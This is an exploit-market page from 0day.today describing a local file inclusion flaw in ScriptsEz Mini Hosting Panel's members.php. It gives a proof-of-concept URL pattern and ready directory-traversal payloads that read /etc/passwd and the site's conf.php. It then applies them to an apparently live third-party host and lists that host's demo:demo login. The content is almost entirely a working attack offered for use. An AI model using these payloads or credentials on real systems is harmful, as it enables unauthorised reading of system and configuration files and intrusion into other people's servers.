[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3866
Category
web applications
Date add
08-10-2008
Platform
unsorted
============================================================
ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability
============================================================


# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability

# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: members.php

PoC:             /members.php?act=view&p=[FILE]&dir=[DIR]
Exploits: 
/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
conf.php     --> /members.php?act=view&p=conf.php&dir=/test/../../..

live demo:
http://hosting.cgixp.apkafuture.com/index.php?action=login
demo:demo (user login)

http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../..

Ingenious work :D



#  0day.today [2024-11-16]  #